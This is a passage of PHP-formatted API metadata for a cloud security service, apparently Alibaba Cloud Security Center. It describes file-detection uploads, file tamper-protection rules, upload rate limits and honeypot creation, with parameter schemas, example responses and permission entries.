'0a212417e65c26ff133cfff28f6c****', 'title' => ''], 'required' => false, 'example' => 'CreateFileDetectUploadUrl', 'maxItems' => 200, 'title' => '', ], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the file. Valid values:'."\n" ."\n" .'* **0**: unknown file'."\n" .'* **1**: binary file'."\n" .'* **2**: webshell file'."\n" .'* **4**: script file'."\n" ."\n" .'> If you do not know the type of the file, set this parameter to **0**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '0', 'title' => ''], ], [ 'name' => 'HashKeyContextList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The hash values of files.'."\n" ."\n" .'> You must specify at least one of the **HashKeyList** and **HashKeyContextList** parameters.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'HashKey' => ['description' => 'The hash value of the file.'."\n", 'type' => 'string', 'required' => false, 'example' => '30319dd5cee8f894766e479cac170da0', 'title' => ''], 'FileSize' => ['description' => 'The size of the file. Unit: bytes.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '2698557', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 200, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => ' ', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '09969D2C-4FAD-429E-BFBF-9A60DEF8BF6F', 'title' => ''], 'UploadUrlList' => [ 'description' => 'An array consisting of the parameters that are required to upload a file.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'PublicUrl' => ['description' => 'The public endpoint of the URL to which the file is uploaded.'."\n", 'type' => 'string', 'example' => 'http://example.com', 'title' => ''], 'InternalUrl' => ['description' => 'The internal endpoint of the URL to which the file is uploaded.'."\n", 'type' => 'string', 'example' => 'http://example.com', 'title' => ''], 'Expire' => ['description' => 'The timestamp when the values of the parameters expire. Unit: milliseconds.'."\n", 'type' => 'string', 'example' => '1658562101370', 'title' => ''], 'Context' => [ 'description' => 'The signature information.'."\n", 'type' => 'object', 'properties' => [ 'AccessId' => ['description' => 'The AccessKey ID that is used to access the OSS bucket.'."\n", 'type' => 'string', 'example' => 'yourAccessKeyID', 'title' => ''], 'Policy' => ['description' => 'The policy that poses limits on file upload. For example, the policy can limit the size of the file.'."\n", 'type' => 'string', 'example' => 'eyJleHBpcmF0aW9uIjoiMjAyMi0wNy0yM1QxMDo1ODoxMC****', 'title' => ''], 'Signature' => ['description' => 'The signature that is used to upload the file.'."\n", 'type' => 'string', 'example' => 'wDhPgVdnY/bkKFYcYFl+4crl****', 'title' => ''], 'OssKey' => ['description' => 'The key of the file that is used after the file is uploaded to the OSS bucket.'."\n", 'type' => 'string', 'example' => '1/2022/06/23/15/41/16559701077444693a0c6-33b2-4cc2-a99f-9f38b8b8****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'FileExist' => ['description' => 'Indicates whether the file exists in the cloud. Valid values:'."\n" ."\n" .'* **true**: The file exists in the cloud. You do not need to upload the file.'."\n" .'* **false**: The file does not exist in the cloud. You must upload the file.'."\n", 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'HashKey' => ['description' => 'The identifier of the file.'."\n", 'type' => 'string', 'example' => '0a212417e65c26ff133cfff28f6c****', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The error message returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RequestTooFrequently', 'errorMessage' => 'Request too frequently, please try again later', 'description' => ''], ['errorCode' => 'InvalidApiDetectType', 'errorMessage' => 'Unsupported Api Detect Type.', 'description' => 'The file type is not supported.'], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'SystemBusy', 'errorMessage' => 'System busy, please try again later.', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"09969D2C-4FAD-429E-BFBF-9A60DEF8BF6F\\",\\n \\"UploadUrlList\\": [\\n {\\n \\"PublicUrl\\": \\"http://example.com\\",\\n \\"InternalUrl\\": \\"http://example.com\\",\\n \\"Expire\\": \\"1658562101370\\",\\n \\"Context\\": {\\n \\"AccessId\\": \\"yourAccessKeyID\\",\\n \\"Policy\\": \\"eyJleHBpcmF0aW9uIjoiMjAyMi0wNy0yM1QxMDo1ODoxMC****\\",\\n \\"Signature\\": \\"wDhPgVdnY/bkKFYcYFl+4crl****\\",\\n \\"OssKey\\": \\"1/2022/06/23/15/41/16559701077444693a0c6-33b2-4cc2-a99f-9f38b8b8****\\"\\n },\\n \\"FileExist\\": false,\\n \\"HashKey\\": \\"0a212417e65c26ff133cfff28f6c****\\",\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'CreateFileDetectUploadUrl', 'description' => 'You can call this operation to query the parameters that are required to upload a file for detection. If the value of the response parameter FileExist is true, the file that you want to upload for detection already exists in the cloud. In this case, you can directly push the file for detection. If the value of the response parameter FileExist is false, you must use the form upload method to upload the file to the specified Object Storage Service (OSS) bucket based on the response parameters of this operation.'."\n" ."\n" .'The form upload method is provided by OSS. For more information, see [Form upload](~~84788~~).'."\n" ."\n" .'The HashKey parameter is included in all API operations that are related to the file detection feature. The parameter specifies the unique identifier of a file. Only MD5 hash values are supported. Before you call this operation, calculate the MD5 hash value of the file.'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '200', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateFileDetectUploadUrl'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateFileDetectUploadUrl', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'CreateFileProtectClientRule' => [ 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '188625', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The name of the rule.', 'type' => 'string', 'required' => true, 'example' => '规则****', 'title' => ''], ], [ 'name' => 'ProcPaths', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of process monitoring paths. Wildcards are supported.', 'type' => 'array', 'items' => ['description' => 'The process monitoring path. Wildcards are supported.', 'type' => 'string', 'required' => false, 'example' => '/usr/local/*', 'title' => ''], 'required' => true, 'maxItems' => 128, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'FilePaths', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of monitored file paths. Wildcards are supported.', 'type' => 'array', 'items' => ['description' => 'The monitored file path. Wildcards are supported.', 'type' => 'string', 'required' => false, 'example' => '/usr/*', 'title' => ''], 'required' => true, 'maxItems' => 128, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'FileOps', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of operations performed on files.', 'type' => 'array', 'items' => [ 'description' => 'The list of operations performed on files.', 'type' => 'string', 'enum' => ['WRITE', 'READ', 'DELETE', 'RENAME', 'CHMOD'], 'required' => false, 'example' => 'WRITE', 'title' => '', ], 'required' => true, 'maxItems' => 128, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'FileTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of monitored file types.', 'type' => 'array', 'items' => ['description' => 'The monitored file type.', 'type' => 'string', 'required' => false, 'example' => 'txt', 'title' => ''], 'required' => false, 'maxItems' => 128, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'RuleAction', 'in' => 'query', 'schema' => [ 'description' => 'The action to take when the policy is hit. Valid values:'."\n" ."\n" .'- **monitor**: Alert.'."\n" .'- **block**: Block.'."\n" .'- **pass**: Allow.', 'type' => 'string', 'required' => true, 'enum' => ['block', 'monitor', 'pass'], 'example' => 'pass', 'title' => '', ], ], [ 'name' => 'AlertLevel', 'in' => 'query', 'schema' => [ 'description' => 'The alert notification level. Valid values:'."\n" ."\n" .'- 0: no alert'."\n" .'- 1: reminder'."\n" .'- 2: suspicious'."\n" .'- 3: high-risk.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'default' => '0', 'enum' => ['0', '1', '2', '3'], 'example' => '0', 'title' => '', ], ], [ 'name' => 'SwitchId', 'in' => 'query', 'schema' => ['description' => 'The switch ID associated with the rule.', 'type' => 'string', 'required' => false, 'example' => 'FILE_PROTECT_RULE_SWITCH_TYPE_0000', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => [ 'description' => 'The status of the rule. Valid values:'."\n" ."\n" .'- **0**: Disabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'enum' => ['0', '1'], 'example' => '0', 'title' => '', ], ], [ 'name' => 'Platform', 'in' => 'query', 'schema' => ['description' => 'The operating system type. Valid values:'."\n" ."\n" .'- **windows**: Windows.'."\n" .'- **linux**: Linux.', 'type' => 'string', 'required' => false, 'example' => 'linux', 'title' => ''], ], [ 'name' => 'ExcludeUsers', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of excluded users.', 'type' => 'array', 'items' => ['description' => 'The excluded user.', 'type' => 'string', 'required' => false, 'example' => 'root', 'title' => ''], 'required' => false, 'maxItems' => 128, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'ClientToken', 'in' => 'formData', 'schema' => ['description' => 'The client token that is used to ensure the idempotence of the request. You can use the client to generate the token, but you must make sure that the token is unique among different requests. The token can contain only ASCII characters and cannot exceed 64 characters in length.', 'type' => 'string', 'required' => false, 'example' => 'xxx', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'Id of the request', 'type' => 'string', 'example' => 'ACF97412-FD09-4D1F-994F-34DF12BREF20'], 'Id' => ['description' => 'The policy ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Create a tamper-proofing rule', 'summary' => 'Creates a file protection rule.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateFileProtectClientRule', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'FileProtectClientRule', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:fileprotectclientrule/*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"ACF97412-FD09-4D1F-994F-34DF12BREF20\\",\\n \\"Id\\": 1\\n}","type":"json"}]', ], 'CreateFileProtectRule' => [ 'summary' => 'Creates a core file monitoring rule.', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '188597', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], ], 'parameters' => [ [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The name of the rule.'."\n", 'type' => 'string', 'required' => true, 'example' => 'tetsRule', 'title' => ''], ], [ 'name' => 'ProcPaths', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The paths to the processes that you want to monitor. Wildcard characters are supported.'."\n", 'type' => 'array', 'items' => ['description' => 'The path to the process that you want to monitor.'."\n", 'type' => 'string', 'required' => false, 'example' => '/usr/local/*', 'title' => ''], 'required' => true, 'maxItems' => 50, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'FilePaths', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The paths to the files that you want to monitor. Wildcard characters are supported.'."\n", 'type' => 'array', 'items' => ['description' => 'The path to the file that you want to monitor.'."\n", 'type' => 'string', 'required' => false, 'example' => '/usr/*', 'title' => ''], 'required' => true, 'maxItems' => 50, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'FileOps', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The operations that you want to perform on the files.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The operation that you want to perform on the file. Valid values:'."\n" ."\n" .'* WRITE'."\n" .'* READ'."\n" .'* DELETE'."\n" .'* RENAME'."\n" .'* CHMOD: change permissions'."\n", 'type' => 'string', 'required' => false, 'example' => 'CHMOD', 'enum' => ['WRITE', 'READ', 'DELETE', 'RENAME', 'CHMOD'], 'title' => '', ], 'required' => true, 'maxItems' => 100, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'RuleAction', 'in' => 'query', 'schema' => [ 'description' => 'The handling method of the rule. Valid values:'."\n" ."\n" .'* pass: allow'."\n" .'* alert'."\n", 'type' => 'string', 'required' => true, 'example' => 'pass', 'enum' => ['alert', 'pass'], 'title' => '', ], ], [ 'name' => 'AlertLevel', 'in' => 'query', 'schema' => [ 'description' => 'The severity of alerts. Valid values:'."\n" ."\n" .'* 0: does not generate alerts'."\n" .'* 1: sends notifications'."\n" .'* 2: suspicious'."\n" .'* 3: high-risk'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'enum' => ['0', '1', '2', '3'], 'title' => '', ], ], [ 'name' => 'SwitchId', 'in' => 'query', 'schema' => ['description' => 'The switch ID of the rule.'."\n", 'type' => 'string', 'required' => false, 'example' => 'FILE_PROTECT_RULE_SWITCH_TYPE_0000', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => [ 'description' => 'Specifies whether to enable the rule. Valid values:'."\n" ."\n" .'* **1**: yes'."\n" .'* **0**: no'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'enum' => ['0', '1'], 'title' => '', ], ], [ 'name' => 'Platform', 'in' => 'query', 'schema' => ['type' => 'string', 'required' => false, 'description' => 'The type of the operating system. Valid values:'."\n" ."\n" .'* **windows**: Windows'."\n" .'* **linux**: Linux', 'example' => 'linux', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'Schema of Response', 'description' => 'Schema of Response'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'Id of the request', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'EC7C8984-D108-516F-9D36-3DF1D1228CCA'], 'RuleId' => ['description' => 'The ID of the rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '123', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'InvalidFilePath', 'errorMessage' => 'Invalid FilePath value.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"EC7C8984-D108-516F-9D36-3DF1D1228CCA\\",\\n \\"RuleId\\": 123\\n}","type":"json"}]', 'title' => 'CreateFileProtectRule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateFileProtectRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateFileProtectRule', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'ClientFileProtect', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:clientfileprotect/*'], ], ], ], ], ], 'CreateFileUploadLimit' => [ 'summary' => 'Specifies the queries per second (QPS) limit on the files uploaded from the client.', 'methods' => ['post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '177850', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Limit', 'in' => 'query', 'schema' => ['description' => 'The QPS limit on the files uploaded from the client. Valid values: 100 to 10000.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '100', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'result', 'description' => 'result'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'requestId', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'CE500770-42D3-442E-9DDD-156E0F9F3B45'], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CE500770-42D3-442E-9DDD-156E0F9F3B45\\"\\n}","type":"json"}]', 'title' => 'CreateFileUploadLimit', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateFileUploadLimit'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateFileUploadLimit', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'FileUploadLimit', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:fileuploadlimit/*'], ], ], ], ], ], 'CreateHoneypot' => [ 'summary' => 'Creates a honeypot.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'HoneypotImageName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the honeypot image.'."\n" ."\n" .'> You can call the [ListAvailableHoneypot](~~ListAvailableHoneypot~~) operation to query the names of images from the **HoneypotImageName** response parameter.'."\n", 'type' => 'string', 'required' => true, 'example' => 'HoneyPotImageName'], ], [ 'name' => 'HoneypotName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The custom name of the honeypot.'."\n", 'type' => 'string', 'required' => true, 'example' => 'ruoyi'], ], [ 'name' => 'NodeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the management node.'."\n" ."\n" .'> You can call the [ListHoneypotNode](~~ListHoneypotNode~~) operation to query the IDs of management nodes.'."\n", 'type' => 'string', 'required' => true, 'example' => 'a882e590-b87b-45a6-87b9-d0a3e5a0****'], ], [ 'name' => 'HoneypotImageId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the honeypot image.'."\n" ."\n" .'> You can call the [ListAvailableHoneypot](~~ListAvailableHoneypot~~) operation to query the IDs of images from the **HoneypotImageId** response parameter.'."\n", 'type' => 'string', 'required' => true, 'example' => 'sha256:ebc4c102ac407d53733c2373e8888a733ddce86f163ccbe7492ae1cbf26****'], ], [ 'name' => 'Meta', 'in' => 'query', 'schema' => ['description' => 'The custom configuration of the honeypot in the JSON format. The value contains the following fields:'."\n" ."\n" .'* **trojan_git**: Git-specific Defense. Valid values:'."\n" ."\n" .' * **zip**: Git Source Code Package'."\n" .' * **web**: Git Directory Leak'."\n" .' * **close**: Disabled'."\n" ."\n" .'* **trojan_git_addr**: Git Trojan Address.'."\n" ."\n" .'* **trojan_git.zip**: Git Trojan.'."\n" ."\n" .'* **burp**: Burp-specific Defense. Valid values:'."\n" ."\n" .' * **open**: Enable'."\n" .' * **close**: Disable'."\n" ."\n" .'* **portrait_option**: Source Tracing Configuration. Valid values:'."\n" ."\n" .' * **false**: Disable'."\n" .' * **true**: Enable'."\n", 'type' => 'string', 'required' => false, 'example' => '{\\"trojan_git\\":\\"close\\",\\"burp\\":\\"close\\",\\"portrait_option\\":\\"false\\"}', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => 'PlainResult', 'description' => 'PlainResult'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The information about the honeypot.'."\n", 'type' => 'object', 'properties' => [ 'HoneypotId' => ['title' => '', 'description' => 'The ID of the honeypot.'."\n", 'type' => 'string', 'example' => '9bf8cd373112263d4bc102fc5dba9d9f812ee05d4d35c487d330d52e937f****'], 'HoneypotName' => ['title' => '', 'description' => 'The custom name of the honeypot.'."\n", 'type' => 'string', 'example' => 'ruoyi'], 'ControlNodeName' => ['title' => '', 'description' => 'The name of the management node.'."\n", 'type' => 'string', 'example' => 'managerNodename'], 'HoneypotImageName' => ['title' => '', 'description' => 'The name of the honeypot image.'."\n", 'type' => 'string', 'example' => 'tcp_proxy'], 'PresetId' => ['title' => '', 'description' => 'The ID of the custom configuration for the honeypot.'."\n", 'type' => 'string', 'example' => 'ddh3731641137fe4b72b245346a2721d4b6tdgg3731641137fe4b72b245346a2721***'], 'State' => [ 'title' => '', 'description' => 'An array that consists of the status information about the honeypot.'."\n", 'type' => 'array', 'items' => ['description' => 'The status of the honeypot. Value:'."\n" .'- **starting**: starting'."\n" .'- **running**: normal'."\n" .'- **exited**: closed'."\n" .'- **upgrade**: updating'."\n" .'- **deleting**: deleting'."\n" .'- **resetting**: resetting'."\n" .'- **created**: created'."\n" .'- **stopping**: stopping', 'type' => 'string', 'example' => 'starting', 'title' => ''], 'example' => '', ], 'HoneypotImageDisplayName' => ['title' => '', 'description' => 'The display name of the honeypot image.'."\n", 'type' => 'string', 'example' => 'HoneyDisplayName'], 'NodeId' => ['title' => '', 'description' => 'The ID of the management node.'."\n", 'type' => 'string', 'example' => 'a882e590-b87b-45a6-87b9-d0a3e5a0****'], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The error message returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '29874225-EAAC-5415-8501-32DD20FD29F6', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"HoneypotId\\": \\"9bf8cd373112263d4bc102fc5dba9d9f812ee05d4d35c487d330d52e937f****\\",\\n \\"HoneypotName\\": \\"ruoyi\\",\\n \\"ControlNodeName\\": \\"managerNodename\\",\\n \\"HoneypotImageName\\": \\"tcp_proxy\\",\\n \\"PresetId\\": \\"ddh3731641137fe4b72b245346a2721d4b6tdgg3731641137fe4b72b245346a2721***\\",\\n \\"State\\": [\\n \\"starting\\"\\n ],\\n \\"HoneypotImageDisplayName\\": \\"HoneyDisplayName\\",\\n \\"NodeId\\": \\"a882e590-b87b-45a6-87b9-d0a3e5a0****\\"\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"29874225-EAAC-5415-8501-32DD20FD29F6\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'CreateHoneypot', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateHoneypot'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateHoneypot', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneyPot', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypot/*'], ], ], ], ], ], 'CreateHoneypotNode' => [ 'summary' => 'Creates a management node.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'NodeName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the management node.'."\n", 'type' => 'string', 'required' => true, 'example' => 'manageNode'], ], [ 'name' => 'AvailableProbeNum', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The number of available probes.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20'], ], [ 'name' => 'AllowHoneypotAccessInternet', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'Specifies whether to allow honeypots to access the Internet. Valid values:'."\n" ."\n" .'* **true**: allows honeypots to access the Internet.'."\n" .'* **false**: does not allow honeypots to access the Internet.'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'true'], ], [ 'name' => 'SecurityGroupProbeIpList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The CIDR blocks that are allowed to access the management node.'."\n", 'type' => 'array', 'items' => ['description' => 'The CIDR block that is allowed to access the management node.'."\n", 'type' => 'string', 'required' => false, 'example' => '0.0.0.0/0', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => 'BaseResult', 'description' => 'BaseResult'."\n", 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The error message returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '028CF634-5268-5660-9575-48C9ED6BF880', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'HoneypotNode' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'NodeId' => ['description' => 'The ID of the management node.'."\n", 'type' => 'string', 'example' => '37a15ff1-3475-4897-aa6c-f7fd9122****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'InvalidParam', 'errorMessage' => 'There was an error with your request.', 'description' => 'An error occurred while processing your request. Try again later.'], ['errorCode' => 'NeedBuy', 'errorMessage' => 'This service shoule be purchased first.', 'description' => 